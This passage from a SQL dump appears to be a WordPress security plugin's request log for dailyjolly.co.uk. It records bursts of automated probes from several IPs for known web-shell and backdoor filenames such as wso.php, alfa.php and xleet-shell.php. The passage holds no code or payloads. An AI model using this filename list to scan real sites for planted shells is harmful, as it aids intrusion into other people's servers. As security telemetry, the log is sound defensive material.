,1673898023.3832,55,'wvG8UZfMdcxVq6migbyIuzEN','','19|0|0|0|www.dailyjolly.co.uk/wp_wrong_datlib.php',0,19,0),('91.239.157.179',1542430131,'',0,1673898024.6175,55,'lFb7L6DUMQypAidaZN5YmVSE','','19|0|0|0|www.dailyjolly.co.uk/beence.php',0,19,0),('91.239.157.179',1542430131,'',0,1673898029.0945,55,'e3nHh8lkQp46VixTBMPvuArs','','19|0|0|0|www.dailyjolly.co.uk/export.php',0,19,0),('91.239.157.179',1542430131,'',0,1673898029.7361,55,'Mu3Xocp2l48iNTKqafRrxBC5','','19|0|0|0|www.dailyjolly.co.uk/wp-content/export.php',0,19,0),('91.239.157.179',1542430131,'',0,1673898029.7934,10,'Mu3Xocp2l48iNTKqafRrxBC5','','707|0|0|0|www.dailyjolly.co.uk/wp-content/export.php',0,707,0),('91.239.157.219',1542430171,'',0,1673898067.9909,55,'UfQYa07cdTNmp59nCOrbF2VR','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-atom.php',0,19,0),('91.239.157.219',1542430171,'',0,1673898144.4547,55,'ROY2xgLW8QMqD5mI1uGteJAn','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/images/css.php',0,19,0),('91.239.157.219',1542430171,'',0,1673898145.1448,55,'3TOYGsURhQwC6tjvnzJD9ifX','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/css.php',0,19,0),('91.239.157.219',1542430171,'',0,1673898146.1892,55,'XkSYvrwua93QymFEZUnqBLHl','','19|0|0|0|www.dailyjolly.co.uk/defau1t.php',0,19,0),('91.239.157.219',1542430171,'',0,1673898170.3835,55,'bv6zIjUAB72GhJVPog1yTZ4H','','19|0|0|0|www.dailyjolly.co.uk/moduless.php',0,19,0),('91.239.157.219',1542430171,'',0,1673898170.4513,10,'bv6zIjUAB72GhJVPog1yTZ4H','','707|0|0|0|www.dailyjolly.co.uk/moduless.php',0,707,0),('45.248.151.22',771266326,'',0,1673898321.1391,55,'tcy2YA45oXgpbESjuFa0QhIq','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php',0,19,0),('45.248.151.22',771266326,'',0,1673898322.2230,55,'rLKDI36b7C4P0hcsJ1tan8GO','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php',0,19,0),('45.248.151.22',771266326,'',0,1673898328.6036,55,'PoR7pdb1T5crWeE4zFmDSitq','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php',0,19,0),('45.248.151.22',771266326,'',0,1673898330.1505,55,'I2vKTwe0ghFb6W8sBlinqNJf','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/alera/alpha.php',0,19,0),('45.248.151.22',771266326,'',0,1673898331.0508,55,'OF8AoTtfmv9yIMjxQK6kwbnS','','19|0|0|0|www.dailyjolly.co.uk/wp-commentin.php',0,19,0),('45.248.151.22',771266326,'',0,1673898331.1583,10,'OF8AoTtfmv9yIMjxQK6kwbnS','','707|0|0|0|www.dailyjolly.co.uk/wp-commentin.php',0,707,0),('45.248.151.22',771266326,'',0,1673898332.0364,100,'sRvhTAyt4YJd3X82NOSBgk0m','','13|0|0|0|www.dailyjolly.co.uk/wp/wp-commentin.php',0,13,0),('45.248.151.22',771266326,'',0,1673898333.2579,100,'STk6BqQhtIpURoNxeXr0MmF3','','13|0|0|0|www.dailyjolly.co.uk/wordpress/wp-commentin.php',0,13,0),('45.248.151.22',771266326,'',0,1673898334.0563,100,'gsMSyPHuC1cQz28dqEFZteaW','','13|0|0|0|www.dailyjolly.co.uk/blog/wp-commentin.php',0,13,0),('45.248.151.22',771266326,'',0,1673898335.3223,100,'KifukGxdJpYEAQWz4D9blFVj','','13|0|0|0|www.dailyjolly.co.uk/site/wp-commentin.php',0,13,0),('91.238.82.83',1542345299,'',0,1673898474.3708,55,'Gjazw0FlCvMpLZePfr9gd4hu','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/wpconfig.bak.php',0,19,0),('91.238.82.83',1542345299,'',0,1673898499.1676,55,'e81YgKGTbqvkhNJ9xuDR0aHB','','19|0|0|0|www.dailyjolly.co.uk/archives.php',0,19,0),('91.238.82.83',1542345299,'',0,1673898500.1095,55,'dDr8wYUZRQXt0uy4AbLsmz7M','','19|0|0|0|www.dailyjolly.co.uk/defau11.php',0,19,0),('172.174.106.89',2897111641,'',0,1673904678.3377,55,'RGMIJWDHkY6E7safdzb0yreX','','19|0|0|0|dailyjolly.co.uk/wp-plain.php',0,19,0),('172.174.106.89',2897111641,'',0,1673904678.5940,55,'uPY9aQjoJBLr0c8xGZ12RqnM','','19|0|0|0|dailyjolly.co.uk/wsgqsjlx.php',0,19,0),('4.233.59.82',82393938,'',0,1673906085.8043,55,'LZjVIUoCy71Md2exciA5YwrR','','19|0|0|0|www.dailyjolly.co.uk/1index.php',0,19,0),('4.233.59.82',82393938,'',0,1673906086.0571,55,'ZnCxuasbpLqOjU6mPYTWfrVh','','19|0|0|0|www.dailyjolly.co.uk/2index.php',0,19,0),('4.233.59.82',82393938,'',0,1673906086.3289,55,'fOlrTx4UmCVZBts8niJLdH1I','','19|0|0|0|www.dailyjolly.co.uk/3index.php',0,19,0),('4.233.59.82',82393938,'',0,1673906086.6434,55,'RDkJM2oUT7p5uGWyHgvh4r9F','','19|0|0|0|www.dailyjolly.co.uk/wp-admin.php',0,19,0),('4.233.59.82',82393938,'',0,1673906086.9435,55,'lYiOrCmDSEp6AgRMxaskTKIw','','19|0|0|0|www.dailyjolly.co.uk/content.php',0,19,0),('4.233.59.82',82393938,'',0,1673906086.9675,10,'lYiOrCmDSEp6AgRMxaskTKIw','','707|0|0|0|www.dailyjolly.co.uk/content.php',0,707,0),('4.233.59.82',82393938,'',0,1673906087.2753,55,'rEJdLQV6u7K3HY1hwOGC2tcf','','19|0|0|0|www.dailyjolly.co.uk/old-index.php',0,19,0),('4.233.59.82',82393938,'',0,1673906087.5579,55,'mx3H9z50Zyr4whOQtp2RLeJ1','','19|0|0|0|www.dailyjolly.co.uk/new-index.php',0,19,0),('4.233.59.82',82393938,'',0,1673906087.8236,55,'g5GzKSyhn0ldpo9uabNms1VD','','19|0|0|0|www.dailyjolly.co.uk/admin.php',0,19,0),('4.233.59.82',82393938,'',0,1673906088.1130,55,'auy1DKiRc6Mg0tH24Owq3beZ','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/xm.php',0,19,0),('4.233.59.82',82393938,'',0,1673906088.3771,55,'X6auoNO7zCec3dUVwEKLMmj2','','19|0|0|0|www.dailyjolly.co.uk/wikindex.php',0,19,0),('4.233.59.82',82393938,'',0,1673906088.6492,55,'Ao28tNVXlQ0RyknrUqYc6EOm','','19|0|0|0|www.dailyjolly.co.uk/ups.php',0,19,0),('4.233.59.82',82393938,'',0,1673906088.9771,55,'uAE3qQfnvaKLPJhU6picRIxt','','19|0|0|0|www.dailyjolly.co.uk/media-admin.php',0,19,0),('4.233.59.82',82393938,'',0,1673906089.2612,55,'UFoc3wagHW0qhmj1MyrfXJIT','','19|0|0|0|www.dailyjolly.co.uk/mt/pekok.php',0,19,0),('4.233.59.82',82393938,'',0,1673906089.5114,55,'WqlmEciCfp0gDwUrM9QnXR6T','','19|0|0|0|www.dailyjolly.co.uk/wp_wrong_datlib.php',0,19,0),('4.233.59.82',82393938,'',0,1673906089.7458,55,'MN4C7Kv1P3gFf8YV5UdOcbxz','','19|0|0|0|www.dailyjolly.co.uk/fw.php',0,19,0),('4.233.59.82',82393938,'',0,1673906090.0132,55,'aeUDCgTdoALPJ5VktnHWclfZ','','19|0|0|0|www.dailyjolly.co.uk/.cgi/cache/index.php',0,19,0),('4.233.59.82',82393938,'',0,1673906090.2966,55,'DrxnIvWb14OcJpyKl6BkhYtM','','19|0|0|0|www.dailyjolly.co.uk/fox.php',0,19,0),('4.233.59.82',82393938,'',0,1673906090.6061,55,'7YioghTayJAc14LebZDVOKMz','','19|0|0|0|www.dailyjolly.co.uk/fox.php',0,19,0),('4.233.59.82',82393938,'',0,1673906090.8813,55,'v64XImSynjpPDiaeZTK0O5Ls','','19|0|0|0|www.dailyjolly.co.uk/xleet.php',0,19,0),('4.233.59.82',82393938,'',0,1673906091.1342,55,'orUSBu14JzmT2yKhj3qgZiVw','','19|0|0|0|www.dailyjolly.co.uk/radio.php',0,19,0),('4.233.59.82',82393938,'',0,1673906091.7644,55,'SYw43r1ybuAQJl2ICqDzF5E7','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/css.php',0,19,0),('4.233.59.82',82393938,'',0,1673906092.0076,55,'aL5NOmh4oRIE3bCBAlctU0Te','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/wp-atom.php',0,19,0),('4.233.59.82',82393938,'',0,1673906092.2914,55,'gnPKDUvE4qujJlWORCmh7A5c','','19|0|0|0|www.dailyjolly.co.uk/export.php',0,19,0),('4.233.59.82',82393938,'',0,1673906092.5908,55,'7gHQXtA1dhC8NzMebKWLSFyi','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/images/wp-blog.php',0,19,0),('4.233.59.82',82393938,'',0,1673906092.8460,55,'1qZfNAP5Mjrz9C6O0QaxIX4G','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/wp.php',0,19,0),('4.233.59.82',82393938,'',0,1673906093.1411,55,'oQWXeDskZqGnCIcyR4O7Tg0L','','19|0|0|0|www.dailyjolly.co.uk/mini.php',0,19,0),('4.233.59.82',82393938,'',0,1673906093.4524,55,'Eo8jQMgTHRvn2FdUWhcOIYSV','','19|0|0|0|www.dailyjolly.co.uk/wso.php',0,19,0),('4.233.59.82',82393938,'',0,1673906093.7643,55,'7OZvagjcPXJ3sMuNo4qVCBkT','','19|0|0|0|www.dailyjolly.co.uk/alwso.php',0,19,0),('4.233.59.82',82393938,'',0,1673906094.1485,55,'y2OkYJlgZu8pncfKG9HqiI3v','','19|0|0|0|www.dailyjolly.co.uk/shx.php',0,19,0),('4.233.59.82',82393938,'',0,1673906096.5488,55,'QiyBsHJWCTZ6c8jmGOvFhKYk','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/includes/class-wp-media-list-data.php',0,19,0),('4.233.59.82',82393938,'',0,1673906098.8675,55,'BW5Pka0JcVHOR8zXoSFpQDwn','','19|0|0|0|www.dailyjolly.co.uk/shell20220621.php',0,19,0),('4.233.59.82',82393938,'',0,1673906099.1835,55,'71uHtUr4RnphIDZbgTScaksL','','19|0|0|0|www.dailyjolly.co.uk/lufix.php',0,19,0),('4.233.59.82',82393938,'',0,1673906101.3472,55,'eyQpouDxqn3hc9m5jbd0Af1L','','19|0|0|0|www.dailyjolly.co.uk/xleet-shell.php',0,19,0),('4.233.59.82',82393938,'',0,1673906101.7372,55,'OQNHtqpgJYZ23GBolEnmy4ek','','19|0|0|0|www.dailyjolly.co.uk/1.php',0,19,0),('4.233.59.82',82393938,'',0,1673906102.0191,55,'0S5U7TEnvcIzjF6gLXtfOJCZ','','19|0|0|0|www.dailyjolly.co.uk/alfa.php',0,19,0),('4.233.59.82',82393938,'',0,1673906104.5365,55,'jxWUPvEoB09J3eqQOp2gFXkK','','19|0|0|0|www.dailyjolly.co.uk/wp-content/radio.php',0,19,0),('4.233.59.82',82393938,'',0,1673906105.1153,55,'swvufD3CgmHGbOWZJEe98NTk','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/radio.php',0,19,0),('4.233.59.82',82393938,'',0,1673906105.4635,55,'daJ4N7tEjDlyHsSA9K2BiwXT','','19|0|0|0|www.dailyjolly.co.uk/autoload_classmap.php',0,19,0),('4.233.59.82',82393938,'',0,1673906105.7871,55,'ANrR9Iyej1pCv6BkP0bmVG2S','','19|0|0|0|www.dailyjolly.co.uk/a.php',0,19,0),('4.233.59.82',82393938,'',0,1673906106.0815,55,'XwYDyU76IWik83dONPvFmA5e','','19|0|0|0|www.dailyjolly.co.uk/s.php',0,19,0),('4.233.59.82',82393938,'',0,1673906106.4078,55,'oANistC6LeGyMa4H8R9z73BV','','19|0|0|0|www.dailyjolly.co.uk/c.php',0,19,0),('4.233.59.82',82393938,'',0,1673906106.7359,55,'95tr67Tg8Diky0duBzvhW2Ia','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/autoload_classmap.php',0,19,0),('4.233.59.82',82393938,'',0,1673906107.0907,55,'uPCRGvwk6Ay2J4c1XSd5jpfO','','19|0|0|0|www.dailyjolly.co.uk/images/vuln.php',0,19,0),('4.233.59.82',82393938,'',0,1673906107.4630,55,'gkwdZ9cYiQKDBj3ANVh18qrH','','19|0|0|0|www.dailyjolly.co.uk/.tmb/cache/shz.php',0,19,0),('4.233.59.82',82393938,'',0,1673906107.8356,55,'uJ102KOwZ8V3nNmsrdqBEtvc','','19|0|0|0|www.dailyjolly.co.uk/m.php',0,19,0),('4.233.59.82',82393938,'',0,1673906108.2490,55,'9ejYZES4VAI1iBP3phfCn5rx','','19|0|0|0|www.dailyjolly.co.uk/b.php',0,19,0),('4.233.59.82',82393938,'',0,1673906108.9192,55,'sFdpMJE9a5GvjINH240xDLyC','','19|0|0|0|www.dailyjolly.co.uk/x.php',0,19,0),('4.233.59.82',82393938,'',0,1673906109.2186,55,'VdnJcrsoZWLiuFUmxCEqXtAh','','19|0|0|0|www.dailyjolly.co.uk/404.php',0,19,0),('4.233.59.82',82393938,'',0,1673906109.9085,55,'cYBrCVsJOmNj9qIEKQ2FyWTh','','19|0|0|0|www.dailyjolly.co.uk/sym403.php',0,19,0),('4.233.59.82',82393938,'',0,1673906110.2603,55,'XIYTz3r7txHhNPolgksUBiEF','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-class.php',0,19,0),('4.233.59.82',82393938,'',0,1673906110.5128,55,'0e6QuxojSIOLGbdPw5fCqFAa','','19|0|0|0|www.dailyjolly.co.uk/xmlrpcs.php',0,19,0),('4.233.59.82',82393938,'',0,1673906110.7939,55,'5jF0a1SfO8CnoED2pKMxqdAV','','19|0|0|0|www.dailyjolly.co.uk/0z.php',0,19,0),('4.233.59.82',82393938,'',0,1673906111.0675,100,'sJ5KfTrgDNxa10OGZ2WEd8iu','','13|0|0|0|www.dailyjolly.co.uk/wp-includes/customize/class-wp-customize-nav-menu.php',0,13,0),('4.233.59.82',82393938,'',0,1673906111.3078,55,'XafCyxcp942DBPq5HkLvIiUe','','19|0|0|0|www.dailyjolly.co.uk/about.php',0,19,0),('4.233.59.82',82393938,'',0,1673906113.2106,55,'3gC1OQhRjPA96b8tcUGondWI','','19|0|0|0|www.dailyjolly.co.uk/o.php',0,19,0),('4.233.59.82',82393938,'',0,1673906113.4732,55,'vG3dLSk8jPhT0DalEHCoRnMp','','19|0|0|0|www.dailyjolly.co.uk/indeeex.php',0,19,0),('4.233.59.82',82393938,'',0,1673906113.7296,55,'6k7QDMtAxEVJbwNZ1zeLGqIX','','19|0|0|0|www.dailyjolly.co.uk/ne.php',0,19,0),('4.233.59.82',82393938,'',0,1673906114.0725,100,'9eRxgDsY5WHzVr3FIpE1qtd7','','13|0|0|0|www.dailyjolly.co.uk/ff.php',0,13,0),('4.233.59.82',82393938,'',0,1673906114.3483,55,'GQsO7giNH1EzjLcTrvVFPSoX','','19|0|0|0|www.dailyjolly.co.uk/8.php',0,19,0),('4.233.59.82',82393938,'',0,1673906114.6099,55,'4MhseYjiDNJL86b93Cq2aUko','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/radio.php',0,19,0),('4.233.59.82',82393938,'',0,1673906114.9238,55,'Jv1N9ShFgPGQ8Mqd4fIclC7k','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/IXR/hunt.php',0,19,0),('4.233.59.82',82393938,'',0,1673906115.1635,55,'cjoHMrQkCd9n43qyWgJwvfAb','','19|0|0|0|www.dailyjolly.co.uk/xx.php',0,19,0),('4.233.59.82',82393938,'',0,1673906115.4424,55,'lYAzXcNhvIqyOZwM7RrbmK9H','','19|0|0|0|www.dailyjolly.co.uk/1975.php',0,19,0),('4.233.59.82',82393938,'',0,1673906115.6868,55,'yoXWzSxLR5IqbZMrU0J9mwQ3','','19|0|0|0|www.dailyjolly.co.uk/small.php',0,19,0),('4.233.59.82',82393938,'',0,1673912562.0267,55,'meazIuLpb2nqrYUc65DTESMl','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php',0,19,0),('4.233.59.82',82393938,'',0,1673912563.9909,55,'2Rd6ns1hMcz8aDvOqAGfwioH','','19|0|0|0|www.dailyjolly.co.uk/wp-content/theme/seotheme/db.php',0,19,0),('4.233.59.82',82393938,'',0,1673912580.9141,55,'9dcvQ7ZNRPVBHjIbEWz0Yw2M','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php',0,19,0),('4.233.59.82',82393938,'',0,1673912588.9495,55,'42PIVczX3qTG9SdlfYRmrAFO','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/css.php',0,19,0),('20.172.244.167',346879143,'',0,1673916865.9421,55,'aL9k1SmfgsFb7CqZDJeiGHPn','','19|0|0|0|www.dailyjolly.co.uk/up.php',0,19,0),('20.172.244.167',346879143,'',0,1673917004.2444,55,'cduCoZsKjwxteAOl2nqf95Lh','','19|0|0|0|www.dailyjolly.co.uk/upload.php',0,19,0),('5.161.41.233',94448105,'',0,1673917623.1414,55,'yVvJYjXKB2Gwp9nlb76CPa1L','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/css.php',0,19,0),('5.161.41.233',94448105,'',0,1673917628.1162,55,'lfG5pAz3swIC74iF9Q81eatg','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/fonts/css.php',0,19,0),('20.172.244.167',346879143,'',0,1673918842.3293,55,'2ZJdOTMi0p9glGyQ3qbcAwD7','','19|0|0|0|www.dailyjolly.co.uk/shell.php',0,19,0),('20.172.244.167',346879143,'',0,1673920013.1052,55,'8kunm0CVXptSxwci7TLrBEeR','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/network/wp-footer.php',0,19,0),('20.172.244.167',346879143,'',0,1673920684.3109,55,'8sKIt0jCSlDczfwUhGX1idYW','','19|0|0|0|www.dailyjolly.co.uk/wp-info.php',0,19,0),('20.172.244.167',346879143,'',0,1673921065.2738,55,'ckN57TswoytX0iEMJP6QGD8S','','19|0|0|0|www.dailyjolly.co.uk/wp-content/vuln.php',0,19,0),('20.172.244.167',346879143,'',0,1673921413.9365,55,'E9XJMlINYU7Hp4xaDART3jse','','19|0|0|0|www.dailyjolly.co.uk/upel.php',0,19,0),('20.172.244.167',346879143,'',0,1673921746.4387,55,'j9QBoORuF5U6vly8IYseTmgf','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/ppus/up.php',0,19,0),('20.172.244.167',346879143,'',0,1673921746.5534,10,'j9QBoORuF5U6vly8IYseTmgf','','707|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/ppus/up.php',0,707,0),('38.54.89.235',641096171,'',0,1673922323.1410,55,'VbgxHY2hT8tI4foS6szwZmaO','','19|0|0|0|dailyjolly.co.uk/indoxploit.php',0,19,0),('38.54.89.235',641096171,'',0,1673922324.6218,55,'cguA9XviJzNtG2Vq5nxbojUH','','19|0|0|0|dailyjolly.co.uk/wp-class.php',0,19,0),('38.54.89.235',641096171,'',0,1673922326.0927,55,'zYASRZXk4VWo08y1fxnEQa3D','','19|0|0|0|dailyjolly.co.uk/wordpress/wp-class.php',0,19,0),('38.54.89.235',641096171,'',0,1673922327.5463,55,'ZSHl32VkLmrbiXochqwKNeyO','','19|0|0|0|dailyjolly.co.uk/site/wp-class.php',0,19,0),('38.54.89.235',641096171,'',0,1673922330.4590,55,'KdQpEHIk8wDcmeBJZyhF79Cr','','19|0|0|0|dailyjolly.co.uk/wp-includes/wp-class.php',0,19,0),('38.54.89.235',641096171,'',0,1673922330.5409,10,'KdQpEHIk8wDcmeBJZyhF79Cr','','707|0|0|0|dailyjolly.co.uk/wp-includes/wp-class.php',0,707,0),('38.54.89.235',641096171,'',0,1673922332.1459,55,'dL6e9BazvfJAghwTutb8iWZr','','19|0|0|0|dailyjolly.co.uk/wp/wp-includes/wp-class.php',0,19,0),('38.54.89.235',641096171,'',0,1673922333.7801,55,'MjdE0mVqKvl1zNpTUYFto3S6','','19|0|0|0|dailyjolly.co.uk/wordpress/wp-includes/wp-class.php',0,19,0),('38.54.89.235',641096171,'',0,1673922335.3924,55,'tWlirPQ49SV6ehoxscvOnjy8','','19|0|0|0|dailyjolly.co.uk/blog/wp-class.php',0,19,0),('38.54.89.235',641096171,'',0,1673922337.1536,55,'dDg8yuvojTbSJtWkBC1wElZX','','19|0|0|0|dailyjolly.co.uk/mini.php',0,19,0),('38.54.89.235',641096171,'',0,1673922338.7653,55,'vizCdLoVm2sbnRGW13FMSg5r','','19|0|0|0|dailyjolly.co.uk/alfa.php',0,19,0),('38.54.89.235',641096171,'',0,1673922340.2163,55,'Zq5Alpbd8WNOUY7H43ogFcPv','','19|0|0|0|dailyjolly.co.uk/alfa4.php',0,19,0),('38.54.89.235',641096171,'',0,1673922341.6559,55,'0nvHX4sYFOlEwWPZmopK7TAV','','19|0|0|0|dailyjolly.co.uk/dz.php',0,19,0),('38.54.89.235',641096171,'',0,1673922343.2022,55,'uaEGf1rlBhqdzFZDnxXNy04v','','19|0|0|0|dailyjolly.co.uk/fw.php',0,19,0),('20.172.244.167',346879143,'',0,1673922343.4978,55,'URwEVxCyQZjiBrnd0oF8uabO','','19|0|0|0|www.dailyjolly.co.uk/V5.php',0,19,0),('38.54.89.235',641096171,'',0,1673922344.6110,55,'jxWlniHF6kJVhgpefAGcXwy7','','19|0|0|0|dailyjolly.co.uk/sells.php',0,19,0),('38.54.89.235',641096171,'',0,1673922346.0501,55,'wrO4hfLdBtvl2aXYTHpIDVeM','','19|0|0|0|dailyjolly.co.uk/info.php',0,19,0),('38.54.89.235',641096171,'',0,1673922347.4717,55,'JPiVQOH29eYlIxdmfKtUGg47','','19|0|0|0|dailyjolly.co.uk/1.php',0,19,0),('38.54.89.235',641096171,'',0,1673922348.9437,55,'PAXUWsbaOMKnrCIxE6ydZ5VN','','19|0|0|0|dailyjolly.co.uk/wp-admin/fw.php',0,19,0),('38.54.89.235',641096171,'',0,1673922350.3461,55,'6n09yfAMluhVQs8avCiwJUbd','','19|0|0|0|dailyjolly.co.uk/wp-content/fw.php',0,19,0),('38.54.89.235',641096171,'',0,1673922351.8200,55,'mNHFnxi5M9Z2Pa3Y0kfCW8gE','','19|0|0|0|dailyjolly.co.uk/wp-includes/fw.php',0,19,0),('38.54.89.235',641096171,'',0,1673922355.4522,55,'gNbvrnGSqpfJF5d4ZxzIVDPc','','19|0|0|0|dailyjolly.co.uk/wp-admin/wso.php',0,19,0),('38.54.89.235',641096171,'',0,1673922356.9325,55,'MIinzKwFCSVY54kc8NLDEuB6','','19|0|0|0|dailyjolly.co.uk/wp-content/wso.php',0,19,0),('38.54.89.235',641096171,'',0,1673922358.4792,55,'KW8JEuqBC0ISbPca3VMxgpft','','19|0|0|0|dailyjolly.co.uk/wp-includes/wso.php',0,19,0),('38.54.89.235',641096171,'',0,1673922359.9441,55,'C40nxsQAbSf6udUc2poaqX5r','','19|0|0|0|dailyjolly.co.uk/wso.php',0,19,0),('38.54.89.235',641096171,'',0,1673922362.2742,55,'UWZ59RfnIKwtHlT87mkYQ3dA','','19|0|0|0|dailyjolly.co.uk/Alfa.php',0,19,0),('38.54.89.235',641096171,'',0,1673922364.6905,55,'1XMbFv0yk5SZtNxV8BPOHlf7','','19|0|0|0|dailyjolly.co.uk/about.php',0,19,0),('38.54.89.235',641096171,'',0,1673922368.2919,55,'M39btpZlRXa7GoBQeOC4fFwr','','19|0|0|0|dailyjolly.co.uk/shell.php',0,19,0),('38.54.89.235',641096171,'',0,1673922371.5473,55,'8XKC4flzEx7QguRyckJMei9T','','19|0|0|0|dailyjolly.co.uk/404.php',0,19,0),('38.54.89.235',641096171,'',0,1673922373.2891,55,'gmRn50JXL7GbrICwOs6hljxc','','19|0|0|0|dailyjolly.co.uk/403.php',0,19,0),('38.54.89.235',641096171,'',0,1673922374.7827,55,'Oq3scHGXEbvF6olmMZ895TAK','','19|0|0|0|dailyjolly.co.uk/2index.php',0,19,0),('38.54.89.235',641096171,'',0,1673922376.1779,55,'5HV4DCWg7jSkneav9TqXRQl8','','19|0|0|0|dailyjolly.co.uk/doc.php',0,19,0),('38.54.89.235',641096171,'',0,1673922377.7427,55,'3LYx7zfE6yjQZcDRTHduBGnS','','19|0|0|0|dailyjolly.co.uk/priv8.php',0,19,0),('38.54.89.235',641096171,'',0,1673922379.2636,55,'IJHbmMVcxD2ivqBuGzfnotFp','','19|0|0|0|dailyjolly.co.uk/wp-content/uploads/F0x.php',0,19,0),('38.54.89.235',641096171,'',0,1673922380.7496,55,'jnUTpOEMZR52Fl8mHbVXIK96','','19|0|0|0|dailyjolly.co.uk/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',0,19,0),('38.54.89.235',641096171,'',0,1673922382.2643,55,'IuSk16GQa972xwjRpmDbgAlc','','19|0|0|0|dailyjolly.co.uk/wp-22.php',0,19,0),('38.54.89.235',641096171,'',0,1673922383.7967,55,'KS9WJ1edTBUR0jGDsEq2Xonm','','19|0|0|0|dailyjolly.co.uk/mar.php',0,19,0),('38.54.89.235',641096171,'',0,1673922385.3262,55,'jzmcYGENfue70p2CxlUabDBg','','19|0|0|0|dailyjolly.co.uk/marijuana.php',0,19,0),('38.54.89.235',641096171,'',0,1673922386.7664,55,'3EAit6XCmaGMjgHYLPzbd8No','','19|0|0|0|dailyjolly.co.uk/m.php',0,19,0),('38.54.89.235',641096171,'',0,1673922388.1468,55,'BDXtsCE1d2598vIbzilN7xfU','','19|0|0|0|dailyjolly.co.uk/wp-content/admin.php',0,19,0),('38.54.89.235',641096171,'',0,1673922389.6885,55,'OmsX9YKZRuaxlpWcMwPvhkn7','','19|0|0|0|dailyjolly.co.uk/new-index.php',0,19,0),('38.54.89.235',641096171,'',0,1673922391.1530,55,'Q4GF1MvzKwgDy5A7cRBsHbPL','','19|0|0|0|dailyjolly.co.uk/1index.php',0,19,0),('38.54.89.235',641096171,'',0,1673922392.6269,55,'GcRvjhKzVyb4A3LrfW9X012i','','19|0|0|0|dailyjolly.co.uk/sindex.php',0,19,0),('38.54.89.235',641096171,'',0,1673922394.2260,55,'XAoQJM28RWs4tklpCVEayiBK','','19|0|0|0|dailyjolly.co.uk/old-index.php',0,19,0),('38.54.89.235',641096171,'',0,1673922395.7563,55,'AOXGrxbM7YVlvB2SZcHKtkFe','','19|0|0|0|dailyjolly.co.uk/baindex.php',0,19,0),('38.54.89.235',641096171,'',0,1673922397.3263,55,'U6k5AirzJcThRe8ymxDbWCYI','','19|0|0|0|dailyjolly.co.uk/wikindex.php',0,19,0),('38.54.89.235',641096171,'',0,1673922398.7892,55,'VgQDHKCdbzIiA0lZt6wBx3L8','','19|0|0|0|dailyjolly.co.uk/indo.php',0,19,0),('38.54.89.235',641096171,'',0,1673922400.2362,55,'n0sdP5KAGacObxpHNZf6RMqm','','19|0|0|0|dailyjolly.co.uk/wp-blog.php',0,19,0),('38.54.89.235',641096171,'',0,1673922401.7052,55,'kg0P2AXMDeT4LHpqR9ZBzbrm','','19|0|0|0|dailyjolly.co.uk/wp-2018.php',0,19,0),('38.54.89.235',641096171,'',0,1673922403.1231,55,'mioFdH5J36XG8btKIWvaCupV','','19|0|0|0|dailyjolly.co.uk/wp-2019.php',0,19,0),('38.54.89.235',641096171,'',0,1673922404.5219,55,'6SYQiGnaoyChZ5ksLI4l9jxp','','19|0|0|0|dailyjolly.co.uk/wp-2020.php',0,19,0),('38.54.89.235',641096171,'',0,1673922405.9435,55,'2Tgt4RaFofXZzQwAq5L0venu','','19|0|0|0|dailyjolly.co.uk/wp-2021.php',0,19,0),('38.54.89.235',641096171,'',0,1673922407.3475,55,'YeXpIdfkmqjANPEKohx09Lvr','','19|0|0|0|dailyjolly.co.uk/wp-2022.php',0,19,0),('38.54.89.235',641096171,'',0,1673922408.8129,55,'jm4D3SMOYPTVAslaEh6rHbKd','','19|0|0|0|dailyjolly.co.uk/wp-2023.php',0,19,0),('38.54.89.235',641096171,'',0,1673922410.3208,55,'mrO1DUVPdGX5LKcH2T9lyBCS','','19|0|0|0|dailyjolly.co.uk/admin.php',0,19,0),('38.54.89.235',641096171,'',0,1673922411.7928,55,'a0q9TsReZVumvhdBQwYWNLKC','','19|0|0|0|dailyjolly.co.uk/up.php',0,19,0),('38.54.89.235',641096171,'',0,1673922413.2099,55,'PtmYlFr9yRAeIhSvosp0u57Z','','19|0|0|0|dailyjolly.co.uk/style.php',0,19,0),('38.54.89.235',641096171,'',0,1673922414.7417,100,'NCtJmkDZW0jGuced2MVBHPF7','','13|0|0|0|dailyjolly.co.uk/upload.php',0,13,0),('38.54.89.235',641096171,'',0,1673922416.2536,55,'vkMLiK67DqejHC0SfcsumV9E','','19|0|0|0|dailyjolly.co.uk/0z.php',0,19,0),('38.54.89.235',641096171,'',0,1673922417.8590,55,'Q5OLmWwn8uzi7YPpkKXU4qEF','','19|0|0|0|dailyjolly.co.uk/xleet.php',0,19,0),('38.54.89.235',641096171,'',0,1673922419.3616,55,'z5FSmYhy60ACeNfap71TlOU3','','19|0|0|0|dailyjolly.co.uk/indosec.php',0,19,0),('38.54.89.235',641096171,'',0,1673922420.7790,55,'3n8kiSR04lNDdXofHqWxag6E','','19|0|0|0|dailyjolly.co.uk/marijuana.php',0,19,0),('38.54.89.235',641096171,'',0,1673922422.2967,100,'uHUBrKJLyNCOqQ9gbwG2o061','','13|0|0|0|dailyjolly.co.uk/index.php',0,13,0),('38.54.89.235',641096171,'',0,1673922423.8143,100,